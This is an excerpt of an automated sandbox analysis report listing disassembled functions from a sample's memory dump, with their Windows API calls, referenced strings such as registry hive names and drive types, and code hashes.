                                                                                                                                                                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f52f126addaa5756c1b9c52e5435f45e2a50b0e5435a13bb51ec6e265e4eab6f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: df4dfd283724731008085fb92986eee85311897db99423ac3c9a284e24c465f6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f52f126addaa5756c1b9c52e5435f45e2a50b0e5435a13bb51ec6e265e4eab6f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C71F33263052B8BCF309E7CDD505BB33A5AB61356B650128EC669B294FB30DD6DC3A4
                                                                                                                                                                                                                                                                                                                            Function 00268D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268DB5
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268DC9
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268DEC
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00268E0F
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00268E4D
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00266691), ref: 00268EA9
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00268EE2
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00268F25
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00268F5C
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00268F68
                                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00268F78
                                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00266691), ref: 00268F87
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00268FA4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00268FB0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8ef1c0bd7d46b94464837e0dd9d9ea37749cc5a22cb9fe66932ca686b3f2d0b5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 638cea6d3aec8afb7f5a1e7605f07c2add3bef331951d1791c76dd887c73b000
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef1c0bd7d46b94464837e0dd9d9ea37749cc5a22cb9fe66932ca686b3f2d0b5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D61E171A20219BBEB14DF64DC45BBF77A8AF18B10F108206F915D61D1DBB599A0CBA0
                                                                                                                                                                                                                                                                                                                            Function 002448BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0024493D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00244948
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0024499F
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002449DD
                                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00244A1B
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00244A63
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00244A9E
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00244ACC
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 77375e3a4ee4f3cac3a942239555f49ed377460927647710171d64fa2e20ee9e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6ccf779c87fa977a4c685a0fd7a9d3050583d515e2de290ed3daaf18bd38d98e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77375e3a4ee4f3cac3a942239555f49ed377460927647710171d64fa2e20ee9e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9371F1726282129FC714EF24C890A7BB7E4EFA4758F10492EF89697351EB30DD55CB81
                                                                                                                                                                                                                                                                                                                            Function 00236382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00236395
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002363A7
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 002363BE
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002363D3
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002363D9
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002363E9
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002363EF
                                                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00236410
                                                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0023642A
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00236433
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023649A
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 002364D6
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 002364DC
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 002364E3
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0023653A
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00236547
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 0023656C
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00236596
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1ebc38b09df26a25b98554318e8eb945b8a8938ffb13bf5c00a821b01cedc816
                                                                                                                                                                                                                                                                                                                            • Instruction ID: da6129360faaf8455ba008285c20ed2b90a7a5267aee86ecd7b5965296e53f7a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ebc38b09df26a25b98554318e8eb945b8a8938ffb13bf5c00a821b01cedc816
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3719371E0070AAFDB20DFA8DD49B6EBBF9FF48704F108518E586A25A0D7B1E954CB50
                                                                                                                                                                                                                                                                                                                            Function 0025086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00250884
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0025088F
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0025089A
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 002508A5
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 002508B0
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 002508BB
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 002508C6
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 002508D1
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 002508DC
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 002508E7
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 002508F2
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 002508FD
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00250908
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00250913
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0025091E
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00250929
                                                                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 00250939
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0025097B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c18a8e1f57658afb455988f3874a85e1c60a73c14e2406c60d4b50fddffcd111
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7462548ef57b040a41aff2b43b82e520f314ef38bae4f9a91d764f1a32be6d20
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c18a8e1f57658afb455988f3874a85e1c60a73c14e2406c60d4b50fddffcd111
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC4134B0D0831A6ADB109FB68CC985EBFE8BF04754B50452AE518E7291D774D901CF95
                                                                                                                                                                                                                                                                                                                            Function 00233A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k)
                                                                                                                                                                                                                                                                                                                            • API String ID: 176396367-2110454241
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1705f7ea47ca8fa29199835c1be0399567ab7ae943f37678c2062d22c35e5c09
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 01ca0a4857cdce910ce95971f743c8e6799c139d6c2eec33254b8009dec9a2d1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1705f7ea47ca8fa29199835c1be0399567ab7ae943f37678c2062d22c35e5c09
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1E1D3B2A20516ABCF14DFB8C8516EEFBB5BF14714F10412AE456F7250EB30AF658790
                                                                                                                                                                                                                                                                                                                            Function 00269B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00269BA3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002680AE: ClientToScreen.USER32(?,?), ref: 002680D4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002680AE: GetWindowRect.USER32(?,?), ref: 0026814A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002680AE: PtInRect.USER32(?,?,?), ref: 0026815A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00269C0C
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00269C17
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00269C3A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00269C81
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00269C9A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00269CB1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00269CD3
                                                                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 00269CDA
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00269DCD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 221274066-593282862
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5a80289a8b838c00dc0d6b226421d88536839163bb3825f920a9161a09858fc3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6196a5e7c5ae06fd7480409f6a69e8d1892d9a77ec08445794a02d9fcdef57d9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a80289a8b838c00dc0d6b226421d88536839163bb3825f920a9161a09858fc3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8619C71508305AFC701EF64DC89DAFBBE8FF99750F40091EF592922A1DB70AA49CB52
                                                                                                                                                                                                                                                                                                                            Function 001F0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001F0436
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: InitializeCriticalSectionAndSpinCount.KERNEL32(002A170C,00000FA0,D7E9E051,?,?,?,?,00212733,000000FF), ref: 001F048C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00212733,000000FF), ref: 001F0497
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00212733,000000FF), ref: 001F04A8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001F04BE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001F04CC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001F04DA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001F0505
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001F0510
                                                                                                                                                                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 001F0457
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0413: __onexit.LIBCMT ref: 001F0419
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • InitializeConditionVariable, xrefs: 001F04B8
                                                                                                                                                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 001F04C4
                                                                                                                                                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001F0492
                                                                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 001F04A3
                                                                                                                                                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 001F04D2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 58ed58ae2dc12107e2c653f77cf840d5da266c483b17da58a7ce3e07442d1ad1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 39a53cdf5bfa86735db0f4d02f1d16259013497d192e516675163bae14d51f3e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58ed58ae2dc12107e2c653f77cf840d5da266c483b17da58a7ce3e07442d1ad1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B521F936B4471DABD7226BA4BC4EB7A77D5DB4EBA1F044125FA05D3291DFF098008A60
                                                                                                                                                                                                                                                                                                                            Function 00244F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,0026DCD0), ref: 00244F6C
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00244F80
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00244FDE
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00245039
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00245084
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002450EC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EFD52: _wcslen.LIBCMT ref: 001EFD5D
                                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00297C10,00000061), ref: 00245188
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c4b3d4c5f4b9dc02c35b732c7e3a19af049ce3828dd94c912a45eca212e7f66a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8459630ce34fd18153f6e79e0c61e8b1c761045ea13288c32d6fe88c49aa35f5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4b3d4c5f4b9dc02c35b732c7e3a19af049ce3828dd94c912a45eca212e7f66a
